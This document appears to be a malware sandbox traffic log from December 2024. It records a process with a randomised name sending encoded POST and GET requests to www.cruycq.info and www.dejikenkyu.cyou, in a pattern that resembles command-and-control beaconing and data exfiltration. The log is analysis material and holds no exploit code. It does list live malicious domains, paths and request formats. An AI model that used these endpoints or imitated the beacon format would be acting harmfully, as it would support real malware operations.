                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FrCTovmZBh2TTOrTeqBEdPCVTSLsq5Qh89++cJpJloARrTmQOL3tenKo7ZPcIvEyHgjGtiT4glIXytXLzxN/zw==
                                                                                                                    set-cookie: parking_session=ed82d55f-19cb-4eb8-b61c-a08a819f8a87; expires=Tue, 24 Dec 2024 10:52:27 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 46 72 43 54 6f 76 6d 5a 42 68 32 54 54 4f 72 54 65 71 42 45 64 50 43 56 54 53 4c 73 71 35 51 68 38 39 2b 2b 63 4a 70 4a 6c 6f 41 52 72 54 6d 51 4f 4c 33 74 65 6e 4b 6f 37 5a 50 63 49 76 45 79 48 67 6a 47 74 69 54 34 67 6c 49 58 79 74 58 4c 7a 78 4e 2f 7a 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FrCTovmZBh2TTOrTeqBEdPCVTSLsq5Qh89++cJpJloARrTmQOL3tenKo7ZPcIvEyHgjGtiT4glIXytXLzxN/zw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                    Dec 24, 2024 11:37:27.821013927 CET931INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZWQ4MmQ1NWYtMTljYi00ZWI4LWI2MWMtYTA4YTgxOWY4YTg3IiwicGFnZV90aW1lIjoxNzM1MDM2Nj


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    21192.168.2.44995047.83.1.90801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:37:33.494384050 CET682OUTPOST /lf6y/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.cruycq.info
                                                                                                                    Origin: http://www.cruycq.info
                                                                                                                    Referer: http://www.cruycq.info/lf6y/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 204
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 62 6a 31 52 49 59 33 36 4b 71 44 75 73 71 6b 71 33 53 74 51 55 71 46 5a 58 63 4e 31 42 30 58 4a 74 42 6d 4d 66 59 34 74 6e 36 4b 61 74 6a 52 46 4b 66 64 73 68 67 54 43 42 52 64 68 6f 44 6d 68 69 52 64 73 56 33 4d 31 65 6d 4e 61 67 6c 7a 41 58 76 5a 51 33 62 42 4f 4c 79 41 66 62 34 38 33 54 61 31 6e 30 6c 67 67 77 43 38 64 33 6d 2f 6f 4b 73 31 4a 56 44 74 50 78 2b 58 68 55 41 78 59 78 68 41 32 55 6a 77 66 63 59 65 43 2f 56 51 35 38 35 6c 71 34 55 6f 37 70 68 4e 56 50 42 4a 6c 31 59 52 72 2f 65 51 58 39 6d 32 37 76 5a 2f 30 75 61 34 39 38 59 31 4f 50 42 6f 75 77 37 53 72 79 77 3d 3d
                                                                                                                    Data Ascii: APatc2S=bj1RIY36KqDusqkq3StQUqFZXcN1B0XJtBmMfY4tn6KatjRFKfdshgTCBRdhoDmhiRdsV3M1emNaglzAXvZQ3bBOLyAfb483Ta1n0lggwC8d3m/oKs1JVDtPx+XhUAxYxhA2UjwfcYeC/VQ585lq4Uo7phNVPBJl1YRr/eQX9m27vZ/0ua498Y1OPBouw7Sryw==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    22192.168.2.44995947.83.1.90801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:37:36.163964033 CET702OUTPOST /lf6y/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.cruycq.info
                                                                                                                    Origin: http://www.cruycq.info
                                                                                                                    Referer: http://www.cruycq.info/lf6y/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 224
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 62 6a 31 52 49 59 33 36 4b 71 44 75 74 49 77 71 32 7a 74 51 53 4b 46 59 59 38 4e 31 4b 55 58 4e 74 47 75 4d 66 5a 38 48 6e 70 75 61 74 47 39 46 4a 61 78 73 6b 67 54 43 4f 78 63 6c 73 44 6d 51 69 52 67 5a 56 32 67 31 65 6d 70 61 67 68 2f 41 58 63 42 50 34 72 42 49 65 69 41 64 47 6f 38 33 54 61 31 6e 30 6c 30 4b 77 43 6b 64 33 58 50 6f 46 6f 68 47 4c 54 74 4d 6d 4f 58 68 51 41 78 63 78 68 41 55 55 69 74 58 63 61 57 43 2f 51 30 35 6c 4d 5a 31 79 55 6f 78 6e 42 4d 30 4f 30 30 62 77 4c 74 71 39 4d 59 59 32 6e 65 6f 6a 2f 79 75 2f 72 5a 71 75 59 52 39 53 47 68 61 39 34 76 69 70 33 4a 75 68 61 33 39 59 68 42 37 53 38 4e 47 7a 37 34 33 31 45 6f 3d
                                                                                                                    Data Ascii: APatc2S=bj1RIY36KqDutIwq2ztQSKFYY8N1KUXNtGuMfZ8HnpuatG9FJaxskgTCOxclsDmQiRgZV2g1empagh/AXcBP4rBIeiAdGo83Ta1n0l0KwCkd3XPoFohGLTtMmOXhQAxcxhAUUitXcaWC/Q05lMZ1yUoxnBM0O00bwLtq9MYY2neoj/yu/rZquYR9SGha94vip3Juha39YhB7S8NGz7431Eo=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    23192.168.2.44996547.83.1.90801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:37:38.825289011 CET10784OUTPOST /lf6y/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.cruycq.info
                                                                                                                    Origin: http://www.cruycq.info
                                                                                                                    Referer: http://www.cruycq.info/lf6y/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 10304
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 62 6a 31 52 49 59 33 36 4b 71 44 75 74 49 77 71 32 7a 74 51 53 4b 46 59 59 38 4e 31 4b 55 58 4e 74 47 75 4d 66 5a 38 48 6e 70 6d 61 74 30 31 46 4c 35 4a 73 6a 67 54 43 48 52 63 6f 73 44 6d 4a 69 52 34 56 56 32 39 41 65 6b 68 61 67 43 33 41 52 74 42 50 76 62 42 49 47 53 41 65 62 34 38 59 54 61 6c 6a 30 6c 6b 4b 77 43 6b 64 33 56 58 6f 4d 63 31 47 4a 54 74 50 78 2b 58 6c 55 41 78 34 78 68 5a 6a 55 69 6f 31 64 72 32 43 2f 77 6b 35 2b 65 78 31 6f 55 6f 2f 79 42 4d 57 4f 30 77 2b 77 4c 67 54 39 4e 74 31 32 6b 43 6f 79 70 50 59 72 66 46 57 39 70 5a 51 51 42 46 46 6d 4b 44 31 68 33 46 70 70 5a 50 78 4b 46 78 4c 55 64 52 4f 32 4a 38 68 6f 69 43 6e 6f 57 53 4a 43 4a 32 4b 51 33 57 76 30 49 70 45 42 35 75 74 5a 2b 33 6b 63 4b 76 64 36 74 70 47 6a 38 38 2f 78 59 45 72 49 49 67 4b 59 57 48 55 79 36 73 67 45 56 30 4c 70 34 4a 71 36 6f 61 2b 42 6e 4c 36 52 78 32 2f 58 49 72 75 2b 68 4c 36 39 54 47 4b 6d 4e 34 48 39 70 35 35 30 56 77 36 66 69 34 37 6e 69 6d 6f 4f 6f 45 64 62 56 78 6d 42 79 [TRUNCATED]
                                                                                                                    Data Ascii: APatc2S=bj1RIY36KqDutIwq2ztQSKFYY8N1KUXNtGuMfZ8Hnpmat01FL5JsjgTCHRcosDmJiR4VV29AekhagC3ARtBPvbBIGSAeb48YTalj0lkKwCkd3VXoMc1GJTtPx+XlUAx4xhZjUio1dr2C/wk5+ex1oUo/yBMWO0w+wLgT9Nt12kCoypPYrfFW9pZQQBFFmKD1h3FppZPxKFxLUdRO2J8hoiCnoWSJCJ2KQ3Wv0IpEB5utZ+3kcKvd6tpGj88/xYErIIgKYWHUy6sgEV0Lp4Jq6oa+BnL6Rx2/XIru+hL69TGKmN4H9p550Vw6fi47nimoOoEdbVxmByIv2V8AtPUBE6cdiiV0PyO/y84marhhpHkqRibnfKbd/hdEEZsDEG6WmSnNCNEls7nBSaGK+YIpMeTWdedfiB+p6UqM5WGknanU+7ag0wF8FsaX064LpM6zT4AvYllFlfV0jsTxkj4xapbwFrnLh16CBVQNteiMx2FdVssCujxNXtFY8ueWhcFPg9WTKDkFkWb2furkVCIPkdGtFcJ0EtcTvL4OO2HwNVh+ruds298V8aXUxyrh6U8H2fD5GqSsTIYv2wO2T+EqIOTDQRJ9aqJoZgoyihfwWj0mdeZKAvOoXm2SJnOF5irEkvQ+Eue1JkDdBZzUE3tJ0cngxKmVEbAgQsBXfpDVc8M+VMj6o6IuIKVdhI3I32e/HnAedqrhvRj/Lp7qRXOkdkz6OQWsumtc6s8YCQ7Uii8xfIvGiCvDVJaYE3QC7aY+fWY5yT8Nm/vL3mVv9UzC4OMVJu5YLNr8oIkAUnyGjeRRfRej4WNa81AdX/3RIj2OjMYr6iYXCt+lmPHRldqDJU+z0ygoN0EOiCmjsueTHW4AJFkoaWC6JFFRZn3Du49Y1G5QOsYb3wToHlLQgnrwccJVDt96JYw0CyAtChuGX8jiM0SQn4N6W+5ulDBCyy5ha0AnwRS7sghAXEILM5jlTZE1o3Fwxq51npg1urJ7p9Si [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    24192.168.2.44997147.83.1.90801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:37:41.486989021 CET420OUTGET /lf6y/?APatc2S=WhdxLvX8GJneo6U33XtFYdZadP1zCD74gCKWMK8L+5irjEYccqFO+hPhPBcWoDythyZIL285KG4ZhivHPukP3bI3GzR3QcEebrpG7Eo0u0Vi5UP/PYQWYzw=&3FNHL=wVCtFrFXof HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.cruycq.info
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Dec 24, 2024 11:37:43.688059092 CET139INHTTP/1.1 567 unknown
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Tue, 24 Dec 2024 10:37:43 GMT
                                                                                                                    Content-Length: 17
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                                                                    Data Ascii: Request too large


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    25192.168.2.449991104.21.80.1801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:37:49.262809038 CET694OUTPOST /pmpa/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.dejikenkyu.cyou
                                                                                                                    Origin: http://www.dejikenkyu.cyou
                                                                                                                    Referer: http://www.dejikenkyu.cyou/pmpa/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 204
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 5a 63 67 50 4c 39 79 32 4d 57 75 52 7a 72 73 64 5a 4e 64 2f 2b 43 46 79 78 7a 77 78 4c 44 46 70 4b 4c 50 65 35 56 76 6f 58 48 64 37 79 64 69 48 45 4e 59 4d 65 5a 73 2f 51 2f 4b 56 6d 73 30 69 35 47 64 2f 4d 78 77 68 39 74 4e 4b 61 4b 42 47 44 37 32 38 79 4a 47 2b 49 64 38 42 44 42 59 42 6b 69 64 41 59 7a 53 34 42 67 6f 45 64 72 43 61 32 49 67 6b 57 50 49 30 43 6e 5a 62 75 43 6d 43 78 54 42 55 7a 5a 47 66 78 56 69 63 36 49 2f 4e 43 57 4c 31 4d 42 76 59 46 39 79 6f 70 36 59 75 62 6a 45 5a 75 59 47 44 57 75 62 35 76 35 71 57 5a 32 47 38 6a 49 69 2f 2b 73 33 7a 75 42 6b 4a 2b 41 3d 3d
                                                                                                                    Data Ascii: APatc2S=ZcgPL9y2MWuRzrsdZNd/+CFyxzwxLDFpKLPe5VvoXHd7ydiHENYMeZs/Q/KVms0i5Gd/Mxwh9tNKaKBGD728yJG+Id8BDBYBkidAYzS4BgoEdrCa2IgkWPI0CnZbuCmCxTBUzZGfxVic6I/NCWL1MBvYF9yop6YubjEZuYGDWub5v5qWZ2G8jIi/+s3zuBkJ+A==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    26192.168.2.449997104.21.80.1801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:37:51.932306051 CET714OUTPOST /pmpa/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.dejikenkyu.cyou
                                                                                                                    Origin: http://www.dejikenkyu.cyou
                                                                                                                    Referer: http://www.dejikenkyu.cyou/pmpa/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 224
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 5a 63 67 50 4c 39 79 32 4d 57 75 52 79 4b 63 64 59 75 31 2f 72 53 46 78 74 6a 77 78 51 54 46 58 4b 4c 54 65 35 52 32 31 57 31 70 37 7a 38 53 48 46 50 77 4d 66 5a 73 2f 61 66 4b 55 70 4d 30 70 35 47 52 6f 4d 77 4d 68 39 74 5a 4b 61 50 6c 47 43 4b 32 2f 79 5a 47 38 45 39 38 44 4f 68 59 42 6b 69 64 41 59 33 7a 58 42 6b 45 45 64 62 79 61 33 71 59 6e 49 66 49 72 42 6e 5a 62 34 43 6d 4f 78 54 41 37 7a 64 6e 36 78 58 61 63 36 4b 33 4e 43 48 4c 79 43 42 75 79 42 39 79 6a 6e 62 74 71 58 43 78 36 6e 62 43 45 59 4d 62 57 71 2f 6e 4d 49 48 6e 72 78 49 47 4d 6a 72 2b 48 6a 43 5a 41 6c 46 47 33 39 4e 51 6b 34 38 6d 38 5a 61 76 43 72 79 2b 49 48 74 45 3d
                                                                                                                    Data Ascii: APatc2S=ZcgPL9y2MWuRyKcdYu1/rSFxtjwxQTFXKLTe5R21W1p7z8SHFPwMfZs/afKUpM0p5GRoMwMh9tZKaPlGCK2/yZG8E98DOhYBkidAY3zXBkEEdbya3qYnIfIrBnZb4CmOxTA7zdn6xXac6K3NCHLyCBuyB9yjnbtqXCx6nbCEYMbWq/nMIHnrxIGMjr+HjCZAlFG39NQk48m8ZavCry+IHtE=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    27192.168.2.450004104.21.80.1801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:37:54.601563931 CET10796OUTPOST /pmpa/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.dejikenkyu.cyou
                                                                                                                    Origin: http://www.dejikenkyu.cyou
                                                                                                                    Referer: http://www.dejikenkyu.cyou/pmpa/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 10304
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 5a 63 67 50 4c 39 79 32 4d 57 75 52 79 4b 63 64 59 75 31 2f 72 53 46 78 74 6a 77 78 51 54 46 58 4b 4c 54 65 35 52 32 31 57 31 52 37 7a 4f 71 48 45 70 34 4d 4f 70 73 2f 5a 66 4b 5a 70 4d 30 6f 35 46 68 6b 4d 77 42 61 39 76 68 4b 56 4e 74 47 4c 59 65 2f 38 5a 47 38 4d 64 38 41 44 42 59 55 6b 69 4e 45 59 7a 66 58 42 6b 45 45 64 5a 61 61 77 34 67 6e 4b 66 49 30 43 6e 5a 58 75 43 6d 69 78 58 73 42 7a 62 37 45 78 44 75 63 36 71 48 4e 41 31 7a 79 4b 42 75 77 4e 64 7a 6a 6e 62 78 6c 58 43 74 4d 6e 59 65 69 59 4f 48 57 72 61 47 44 62 57 66 31 6d 72 79 54 32 6f 61 69 76 56 78 46 38 79 32 4c 36 39 45 4e 75 39 53 41 55 4a 2b 33 33 41 47 50 45 4e 68 4d 42 42 49 79 35 52 69 4e 30 37 76 56 76 70 54 7a 6e 37 61 4a 49 79 70 4d 6b 59 71 5a 6e 31 64 69 57 31 41 6a 72 53 6d 76 63 34 53 73 45 65 41 69 38 76 6c 79 4f 6f 4b 4c 64 69 46 44 2f 44 69 6a 6b 51 6a 4b 31 48 33 37 6c 57 57 5a 63 71 6f 68 63 65 46 47 39 4a 69 44 64 4d 61 43 63 4e 67 65 30 77 4f 6c 45 6e 72 7a 59 36 6e 53 66 61 5a 4d 66 45 [TRUNCATED]
                                                                                                                    Data Ascii: APatc2S=ZcgPL9y2MWuRyKcdYu1/rSFxtjwxQTFXKLTe5R21W1R7zOqHEp4MOps/ZfKZpM0o5FhkMwBa9vhKVNtGLYe/8ZG8Md8ADBYUkiNEYzfXBkEEdZaaw4gnKfI0CnZXuCmixXsBzb7ExDuc6qHNA1zyKBuwNdzjnbxlXCtMnYeiYOHWraGDbWf1mryT2oaivVxF8y2L69ENu9SAUJ+33AGPENhMBBIy5RiN07vVvpTzn7aJIypMkYqZn1diW1AjrSmvc4SsEeAi8vlyOoKLdiFD/DijkQjK1H37lWWZcqohceFG9JiDdMaCcNge0wOlEnrzY6nSfaZMfEmjOdow47B7/QKj8kl5aaSKF4OE9eBtp3a+S4lTqg2EvrhpQMbw1nS1fgfTccc3LFtalEOx2Rl6M+2D0etCn1IjkkGN2aB+LYXa9ozrsmANyIUBWqQHvp3OAx4REhosgktWSZ+LhLmQWki/UakNRoxddrPgIN2z5F2Mz0qLgFYeTtNXPcBLnPAnCR3z5iDfLiYq6k6ksINU0Gcl1uj3iM1raAu2N2l750YkeFKisMeKlCpg5azBO1IBSuZZA445Ef2vkrZxVlp9bQYI1Zc91H9my1Ocovh/+I8lbdhrsy81B9kOCnFHsXXMD9qaph/oyi584KhLlAUxF/WzrG0OkIooHN2xgWicM0Zlz2qc3BkiGh+JPbuYyp7NVhKuAB4cZgLMcqcAFrCpO/vgOIkUj6x0iVrRUfm94SBZgaW4jUhlz38QI26RPA71BfCLacPh3uoQLoJoZ2qeMDIk0vH1E8bF6wfiy8jgl3ZcjfHk2281NJKLMeKqk82YIF7IsADpGpO1WlE8TPeCxOSg8SKoG4Z7k7GuNOObZKU4qOO1HawZMwvroEm7SzawuVXL8kjtB/yAQXVL5BAIInmKYlUIwiMvu8WfqajUbBAGqGIGCxElpsl/cSOHuXYelhWPvsKafSnZfMZ3UrOtK+mAb6VQ9ZGiwgAD/fAEE9c5 [TRUNCATED]
                                                                                                                    Dec 24, 2024 11:37:56.174464941 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Tue, 24 Dec 2024 10:37:56 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    x-powered-by: PHP/7.4.33
                                                                                                                    x-dns-prefetch-control: on
                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                    strict-transport-security: max-age=31536000;
                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                    x-litespeed-tag: 2ba_HTTP.404,2ba_HTTP.301
                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                    location: https://www.dejikenkyu.cyou/pmpa/
                                                                                                                    x-litespeed-cache-control: no-cache
                                                                                                                    cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KZ%2BNMZsCS1AS8xwcSEa7lJWJCezdZoeGH2U%2FjA3Zf%2Bw7rt%2FKYTAXYYGBSG92ez5ANXnNWUufr%2BEsWER7CqNC%2FyjXx80WYFP%2BobZobCUvOFWQWLoQvrtR21gb2JWSp0TJZ9LR0IrZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f6ff575ff1243ee-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1692&rtt_var=846&sent=3&recv
                                                                                                                    Data Raw:
                                                                                                                    Data Ascii:
                                                                                                                    Dec 24, 2024 11:37:56.174500942 CET129INData Raw: 31 31 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 37 39 36 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 30 26 63 77 6e 64 3d 32 32 38 26 75 6e 73 65 6e 74 5f
                                                                                                                    Data Ascii: 11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10796&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    28192.168.2.450012104.21.80.1801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:37:57.250525951 CET424OUTGET /pmpa/?APatc2S=UeIvIKLKGFys4rt1ZLFH8w433wQ6fCVgMoTtmR20aEJv9MnWadULdaABdMWFlesQuWhFQQZZidkqYdB7fb353dPYMbluACcdqBxcZ3O1YRYJaqin39JmHPU=&3FNHL=wVCtFrFXof HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.dejikenkyu.cyou
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Dec 24, 2024 11:37:59.023072004 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Tue, 24 Dec 2024 10:37:58 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    location: https://dejikenkyu.cyou/pmpa/?APatc2S=UeIvIKLKGFys4rt1ZLFH8w433wQ6fCVgMoTtmR20aEJv9MnWadULdaABdMWFlesQuWhFQQZZidkqYdB7fb353dPYMbluACcdqBxcZ3O1YRYJaqin39JmHPU=&3FNHL=wVCtFrFXof
                                                                                                                    x-powered-by: PHP/7.4.33
                                                                                                                    x-dns-prefetch-control: on
                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                    strict-transport-security: max-age=31536000;
                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                    x-redirect-by: WordPress
                                                                                                                    x-litespeed-cache: miss
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                    cf-cache-status: DYNAMIC
